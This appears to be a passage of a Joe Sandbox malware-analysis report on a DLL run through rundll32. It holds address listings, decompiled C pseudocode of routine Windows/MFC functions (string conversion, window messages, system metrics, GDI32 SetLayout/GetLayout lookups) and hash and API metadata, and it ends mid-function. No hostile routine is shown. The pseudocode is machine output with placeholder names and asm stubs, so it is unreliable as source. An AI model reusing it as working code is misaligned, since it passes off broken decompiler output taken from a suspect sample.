                                                                                                        0x100112d2
                                                                                                        0x100112e2
                                                                                                        0x100112e5
                                                                                                        0x100112e8
                                                                                                        0x100112ed
                                                                                                        0x100112ef
                                                                                                        0x100112f1
                                                                                                        0x100112f1
                                                                                                        0x100112f1
                                                                                                        0x100112ef
                                                                                                        0x100112f4
                                                                                                        0x100112f7
                                                                                                        0x10011307
                                                                                                        0x1001130e
                                                                                                        0x10011315
                                                                                                        0x1001131a
                                                                                                        0x1001131c
                                                                                                        0x1001131e
                                                                                                        0x1001131e
                                                                                                        0x1001131e
                                                                                                        0x1001131c
                                                                                                        0x10011320
                                                                                                        0x10011324
                                                                                                        0x1001132f
                                                                                                        0x1001133b
                                                                                                        0x1001133d
                                                                                                        0x1001133d
                                                                                                        0x1001133d
                                                                                                        0x1001133d
                                                                                                        0x10011344
                                                                                                        0x10011348
                                                                                                        0x10011350
                                                                                                        0x1001135c
                                                                                                        0x1001135c
                                                                                                        0x1001135c
                                                                                                        0x1001135e
                                                                                                        0x10011362
                                                                                                        0x1001136d
                                                                                                        0x10011379
                                                                                                        0x10011379
                                                                                                        0x10011379
                                                                                                        0x10011380
                                                                                                        0x10011383
                                                                                                        0x1001138a
                                                                                                        0x10011392
                                                                                                        0x10011392
                                                                                                        0x10011392
                                                                                                        0x10011399
                                                                                                        0x1001139c
                                                                                                        0x100113a3
                                                                                                        0x100113af
                                                                                                        0x100113af
                                                                                                        0x100113af
                                                                                                        0x100113b6
                                                                                                        0x100113b9
                                                                                                        0x100113c0
                                                                                                        0x100113cc
                                                                                                        0x100113cc
                                                                                                        0x100113cc
                                                                                                        0x100113d3
                                                                                                        0x100113d6
                                                                                                        0x100113dd
                                                                                                        0x100113e9
                                                                                                        0x100113e9
                                                                                                        0x100113e9
                                                                                                        0x100113f0
                                                                                                        0x100113f3
                                                                                                        0x100113fa
                                                                                                        0x10011406
                                                                                                        0x10011406
                                                                                                        0x10011406
                                                                                                        0x1001140d
                                                                                                        0x10011410
                                                                                                        0x10011417
                                                                                                        0x10011423
                                                                                                        0x10011423
                                                                                                        0x10011423
                                                                                                        0x1001142a
                                                                                                        0x1001142d
                                                                                                        0x10011434
                                                                                                        0x1001143c
                                                                                                        0x1001143c
                                                                                                        0x1001143c
                                                                                                        0x10011443
                                                                                                        0x10011446
                                                                                                        0x1001144d
                                                                                                        0x10011455
                                                                                                        0x10011455
                                                                                                        0x10011455
                                                                                                        0x1001145c
                                                                                                        0x1001145f
                                                                                                        0x10011466
                                                                                                        0x10011472
                                                                                                        0x10011472
                                                                                                        0x10011472
                                                                                                        0x10011479
                                                                                                        0x1001147c
                                                                                                        0x10011483
                                                                                                        0x1001148f
                                                                                                        0x1001148f
                                                                                                        0x1001148f
                                                                                                        0x10011496
                                                                                                        0x10011499
                                                                                                        0x100114a0
                                                                                                        0x100114a8
                                                                                                        0x100114a8
                                                                                                        0x100114a8
                                                                                                        0x100114aa
                                                                                                        0x100114ad
                                                                                                        0x100114b0
                                                                                                        0x100114bc
                                                                                                        0x100114be
                                                                                                        0x100114c3
                                                                                                        0x100114c6
                                                                                                        0x100114c6
                                                                                                        0x100114c6
                                                                                                        0x100114d5
                                                                                                        0x100114d7
                                                                                                        0x100114d7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                        • API String ID: 2102423945-4122032997
                                                                                                        • Opcode ID: 8f64765f4ea5e021c2d5c4cf4142c5c1eb15a9e856689c24899df13a9e25d18e
                                                                                                        • Instruction ID: 9d9e82e634741a53376d69eea13adabe477dfa4101b55a4275f28d8d6693f8b7
                                                                                                        • Opcode Fuzzy Hash: 8f64765f4ea5e021c2d5c4cf4142c5c1eb15a9e856689c24899df13a9e25d18e
                                                                                                        • Instruction Fuzzy Hash: A3814EB5D00249AEEB50CFA4C585BDEBFF8EF04384F118165F948EA185E774DA85CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002A904, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002A904(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10072650; // 0xb5e27fef
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E1002A766(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E1002A791(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E1003EFB4(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E10021BC1(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E10021BC1(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E10039F21(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}



























                                                                                                        0x1002a904
                                                                                                        0x1002a904
                                                                                                        0x1002a904
                                                                                                        0x1002a90a
                                                                                                        0x1002a911
                                                                                                        0x1002a918
                                                                                                        0x1002a91e
                                                                                                        0x1002a921
                                                                                                        0x1002a92a
                                                                                                        0x1002a92b
                                                                                                        0x1002a934
                                                                                                        0x1002a942
                                                                                                        0x1002a945
                                                                                                        0x1002a94d
                                                                                                        0x1002a963
                                                                                                        0x1002a965
                                                                                                        0x1002a968
                                                                                                        0x1002a970
                                                                                                        0x1002a96a
                                                                                                        0x1002a96a
                                                                                                        0x1002a96a
                                                                                                        0x1002a97f
                                                                                                        0x1002a9fd
                                                                                                        0x1002a9fd
                                                                                                        0x1002a981
                                                                                                        0x1002a996
                                                                                                        0x1002a99b
                                                                                                        0x1002a99e
                                                                                                        0x00000000
                                                                                                        0x1002a9a0
                                                                                                        0x1002a9a1
                                                                                                        0x1002a9a7
                                                                                                        0x1002a9ac
                                                                                                        0x1002a9ae
                                                                                                        0x1002a9b4
                                                                                                        0x1002a9b9
                                                                                                        0x1002a9bd
                                                                                                        0x1002a9bd
                                                                                                        0x1002a9c1
                                                                                                        0x1002a9c5
                                                                                                        0x1002a9c8
                                                                                                        0x1002a9cc
                                                                                                        0x1002a9cf
                                                                                                        0x1002a9d6
                                                                                                        0x1002a9d9
                                                                                                        0x1002a9e1
                                                                                                        0x1002a9db
                                                                                                        0x1002a9db
                                                                                                        0x1002a9db
                                                                                                        0x1002a9e8
                                                                                                        0x1002aa0d
                                                                                                        0x1002aa14
                                                                                                        0x1002aa1d
                                                                                                        0x1002aa25
                                                                                                        0x1002aa32
                                                                                                        0x1002aa35
                                                                                                        0x1002aa3b
                                                                                                        0x1002aa41
                                                                                                        0x1002a9ef
                                                                                                        0x1002a9ef
                                                                                                        0x1002a9f6
                                                                                                        0x1002a9fb
                                                                                                        0x1002aa05
                                                                                                        0x1002aa0a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002a9fb
                                                                                                        0x1002a9e8
                                                                                                        0x1002a99e
                                                                                                        0x1002aa42
                                                                                                        0x1002aa43
                                                                                                        0x1002a923
                                                                                                        0x1002a923
                                                                                                        0x1002a923
                                                                                                        0x1002aa50

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 1002A92E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1002A976
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002A990
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                        • String ID: System
                                                                                                        • API String ID: 1529587224-3470857405
                                                                                                        • Opcode ID: f57b6397f0c9c0c82a1a830af608b2ea2e7b35a2686c53ef3b4d01f9902342bc
                                                                                                        • Instruction ID: cd77923ceb2e7a963411e42cde1db47b375c643ded8c900d885fb5f9c10a57db
                                                                                                        • Opcode Fuzzy Hash: f57b6397f0c9c0c82a1a830af608b2ea2e7b35a2686c53ef3b4d01f9902342bc
                                                                                                        • Instruction Fuzzy Hash: 2C41C271900215DFDB04DFB4CD85A9EBBB5FF05314F65822AE812EB185EB70A985CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10014454, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10014454(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t31;
				void* _t37;
				void* _t41;
				intOrPtr* _t43;
				void* _t44;
				int _t45;
				intOrPtr* _t48;
				void* _t49;

				_t42 = __ecx;
				_t48 = __ecx;
				_t41 = E1000F039(__ecx);
				_t50 = _t41;
				if(_t41 == 0) {
					E1000836F(_t41, _t42, _t44, _t48, _t50);
				}
				_t43 =  *((intOrPtr*)(_t48 + 0x80));
				_t45 = _a4;
				if(_t43 == 0) {
					L4:
					if(_a8 != 0xffff) {
						__eflags = _t45;
						if(_t45 == 0) {
							L17:
							_t22 = _t48 + 0xa8;
							 *_t22 =  *(_t48 + 0xa8) & 0x00000000;
							__eflags =  *_t22;
							L18:
							_t24 = _t41 + 0x3c;
							 *_t24 =  *(_t41 + 0x3c) | 0x00000040;
							__eflags =  *_t24;
							L19:
							_t31 =  *(_t48 + 0xa8);
							if(_t31 ==  *((intOrPtr*)(_t48 + 0xac))) {
								goto L22;
							}
							_t31 = E1000E5E5(_t41, _t43, _t49, GetParent( *(_t48 + 0x20)));
							if(_t31 == 0) {
								goto L22;
							}
							return PostMessageA( *(_t48 + 0x20), 0x36a, 0, 0);
						}
						__eflags = _a8 & 0x00000810;
						if((_a8 & 0x00000810) != 0) {
							goto L17;
						}
						__eflags = _t45 - 0xf000 - 0x1ef;
						if(_t45 - 0xf000 > 0x1ef) {
							__eflags = _t45 - 0xff00;
							if(_t45 < 0xff00) {
								L14:
								 *(_t48 + 0xa8) = _t45;
								goto L18;
							}
							 *(_t48 + 0xa8) = 0xef1f;
							goto L18;
						}
						_t45 = (_t45 + 0xffff1000 >> 4) + 0xef00;
						__eflags = _t45;
						goto L14;
					}
					 *(_t48 + 0x3c) =  *(_t48 + 0x3c) & 0xffffffbf;
					if( *((intOrPtr*)(_t41 + 0x68)) != 0) {
						 *(_t48 + 0xa8) = 0xe002;
					} else {
						 *(_t48 + 0xa8) = 0xe001;
					}
					SendMessageA( *(_t48 + 0x20), 0x362,  *(_t48 + 0xa8), 0);
					_t43 = _t48;
					_t37 =  *((intOrPtr*)( *_t48 + 0x154))();
					if(_t37 != 0) {
						UpdateWindow( *(_t37 + 0x20));
					}
					goto L19;
				} else {
					_t31 =  *((intOrPtr*)( *_t43 + 0x7c))(_t45, _a8, _a12);
					if(_t31 != 0) {
						L22:
						return _t31;
					}
					goto L4;
				}
			}















                                                                                                        0x10014454
                                                                                                        0x1001445a
                                                                                                        0x10014461
                                                                                                        0x10014463
                                                                                                        0x10014465
                                                                                                        0x10014467
                                                                                                        0x10014467
                                                                                                        0x1001446c
                                                                                                        0x10014474
                                                                                                        0x10014477
                                                                                                        0x1001448d
                                                                                                        0x10014494
                                                                                                        0x100144e5
                                                                                                        0x100144e7
                                                                                                        0x10014529
                                                                                                        0x10014529
                                                                                                        0x10014529
                                                                                                        0x10014529
                                                                                                        0x10014530
                                                                                                        0x10014530
                                                                                                        0x10014530
                                                                                                        0x10014530
                                                                                                        0x10014534
                                                                                                        0x10014534
                                                                                                        0x10014540
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001454c
                                                                                                        0x10014553
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014561
                                                                                                        0x100144e9
                                                                                                        0x100144ef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100144f7
                                                                                                        0x100144fc
                                                                                                        0x10014515
                                                                                                        0x1001451b
                                                                                                        0x1001450d
                                                                                                        0x1001450d
                                                                                                        0x00000000
                                                                                                        0x1001450d
                                                                                                        0x1001451d
                                                                                                        0x00000000
                                                                                                        0x1001451d
                                                                                                        0x10014507
                                                                                                        0x10014507
                                                                                                        0x00000000
                                                                                                        0x10014507
                                                                                                        0x10014496
                                                                                                        0x1001449e
                                                                                                        0x100144ac
                                                                                                        0x100144a0
                                                                                                        0x100144a0
                                                                                                        0x100144a0
                                                                                                        0x100144c6
                                                                                                        0x100144ce
                                                                                                        0x100144d0
                                                                                                        0x100144d8
                                                                                                        0x100144dd
                                                                                                        0x100144dd
                                                                                                        0x00000000
                                                                                                        0x10014479
                                                                                                        0x10014482
                                                                                                        0x10014487
                                                                                                        0x1001456b
                                                                                                        0x1001456b
                                                                                                        0x1001456b
                                                                                                        0x00000000
                                                                                                        0x10014487

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32 ref: 100144C6
                                                                                                        • UpdateWindow.USER32(?), ref: 100144DD
                                                                                                        • GetParent.USER32(?), ref: 10014545
                                                                                                        • PostMessageA.USER32 ref: 10014561
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                                                                                                        • String ID: @
                                                                                                        • API String ID: 33412044-2766056989
                                                                                                        • Opcode ID: 0b902b0e72b624e88f2f3497a87a663efd8a5c83ce47bfd92255e69267417edc
                                                                                                        • Instruction ID: b9ccb1bd8257d746b9c99fcf4ecbea94a89f455cc43f1eb0e785a61d3ba83f4b
                                                                                                        • Opcode Fuzzy Hash: 0b902b0e72b624e88f2f3497a87a663efd8a5c83ce47bfd92255e69267417edc
                                                                                                        • Instruction Fuzzy Hash: C4319371200B01EFE760CF60CC48B5A77E6FF41795F228429F9999A2B2DF71E9849B01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000BDA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E1000BDA7(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000BBFB() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1003F29A(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x10098d20(_a4, _a8);
			}








                                                                                                        0x1000bdb4
                                                                                                        0x1000bdcd
                                                                                                        0x1000be38
                                                                                                        0x1000be38
                                                                                                        0x1000be3a
                                                                                                        0x00000000
                                                                                                        0x1000be3b
                                                                                                        0x1000bdcf
                                                                                                        0x1000bdd6
                                                                                                        0x00000000
                                                                                                        0x1000bdef
                                                                                                        0x1000bdf0
                                                                                                        0x1000bdf3
                                                                                                        0x1000be01
                                                                                                        0x1000be04
                                                                                                        0x1000be0c
                                                                                                        0x1000be0d
                                                                                                        0x1000be0e
                                                                                                        0x1000be0f
                                                                                                        0x1000be16
                                                                                                        0x1000be19
                                                                                                        0x1000be1d
                                                                                                        0x1000be2c
                                                                                                        0x1000be31
                                                                                                        0x1000be34
                                                                                                        0x00000000
                                                                                                        0x1000be34
                                                                                                        0x1000bdd6
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 1000BDE5
                                                                                                        • GetSystemMetrics.USER32 ref: 1000BDFD
                                                                                                        • GetSystemMetrics.USER32 ref: 1000BE04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$Metrics$InfoParameters
                                                                                                        • String ID: B$DISPLAY
                                                                                                        • API String ID: 3136151823-3316187204
                                                                                                        • Opcode ID: b73773b73f2ef2c7aef0ed6eda5f1c8f277f0df2141217e252145798cdc9dc59
                                                                                                        • Instruction ID: 72ce7a1a3acc814aaf3fe75a7447aceb845ebfe7f652ad3d690c1253745187b6
                                                                                                        • Opcode Fuzzy Hash: b73773b73f2ef2c7aef0ed6eda5f1c8f277f0df2141217e252145798cdc9dc59
                                                                                                        • Instruction Fuzzy Hash: FD119472901725ABEB11DF54CC8869B7BE8EF09B80B014061FE04AF149D370DA00CBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10008846, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E10008846(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                                                        0x1000884d
                                                                                                        0x1000884f
                                                                                                        0x1000885b
                                                                                                        0x1000885d
                                                                                                        0x10008865
                                                                                                        0x10008878
                                                                                                        0x1000887c
                                                                                                        0x1000887f
                                                                                                        0x1000887f
                                                                                                        0x10008867
                                                                                                        0x10008870
                                                                                                        0x10008870
                                                                                                        0x10008889

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10038903,00000000), ref: 1000884F
                                                                                                        • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,10038903,00000000), ref: 1000885D
                                                                                                        • SetLastError.KERNEL32(00000078,?,?,10038903,00000000), ref: 1000887F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                                                        • String ID: GDI32.DLL$SetLayout
                                                                                                        • API String ID: 4275029093-2147214759
                                                                                                        • Opcode ID: 26f88aebf82d2240a5b37100dab2a3fc2bb37b0a4b47fca8f0dce6e4cd8df4cf
                                                                                                        • Instruction ID: 9fbfac504fc9fab879c321f057ec9fddd0d52cf81d5381d4a1f95bb4dcd735b3
                                                                                                        • Opcode Fuzzy Hash: 26f88aebf82d2240a5b37100dab2a3fc2bb37b0a4b47fca8f0dce6e4cd8df4cf
                                                                                                        • Instruction Fuzzy Hash: EFE04F32104110EBE3919B658C4D84B7BA2EBC4AA1755CA29FAB9E20A4DF718B55CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10008810, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E10008810(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                                                        0x10008816
                                                                                                        0x10008824
                                                                                                        0x1000882c
                                                                                                        0x10008839
                                                                                                        0x1000883c
                                                                                                        0x1000882e
                                                                                                        0x10008833
                                                                                                        0x10008833
                                                                                                        0x10008845

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,100388F6), ref: 10008818
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10008824
                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1000883C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                                                        • String ID: GDI32.DLL$GetLayout
                                                                                                        • API String ID: 4275029093-2396518106
                                                                                                        • Opcode ID: bbd44cdb57e7566bd5346f1a1961c9396e731f8aca412bb3ef847bf8d67e040a
                                                                                                        • Instruction ID: 18cb7d2df4685322d40cded84f63f3f289445b6b652452f6f9e5929145048d23
                                                                                                        • Opcode Fuzzy Hash: bbd44cdb57e7566bd5346f1a1961c9396e731f8aca412bb3ef847bf8d67e040a
                                                                                                        • Instruction Fuzzy Hash: A3D05E32A04231ABE7A06BB45D4D9467AA4EB04FF57458A34FE69F21E0CFB0CF048790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002D225, Relevance: 7.7, APIs: 5, Instructions: 214windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E1002D225(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed char _t81;
				signed int _t86;
				signed int _t91;
				signed int _t93;
				signed int _t101;
				signed int _t117;
				intOrPtr _t131;
				void* _t132;
				intOrPtr _t139;
				void* _t153;
				signed int _t157;
				void* _t158;
				intOrPtr _t161;
				void* _t162;
				signed int _t164;
				void* _t166;

				_t153 = __edx;
				_t133 = __ecx;
				_t164 = _t166 - 0xb8;
				_t73 =  *0x10072650; // 0xb5e27fef
				 *(_t164 + 0xb4) = _t73 ^ _t164;
				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
				_t131 = __ecx;
				_t170 = __ecx;
				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
				if(__ecx == 0) {
					L1:
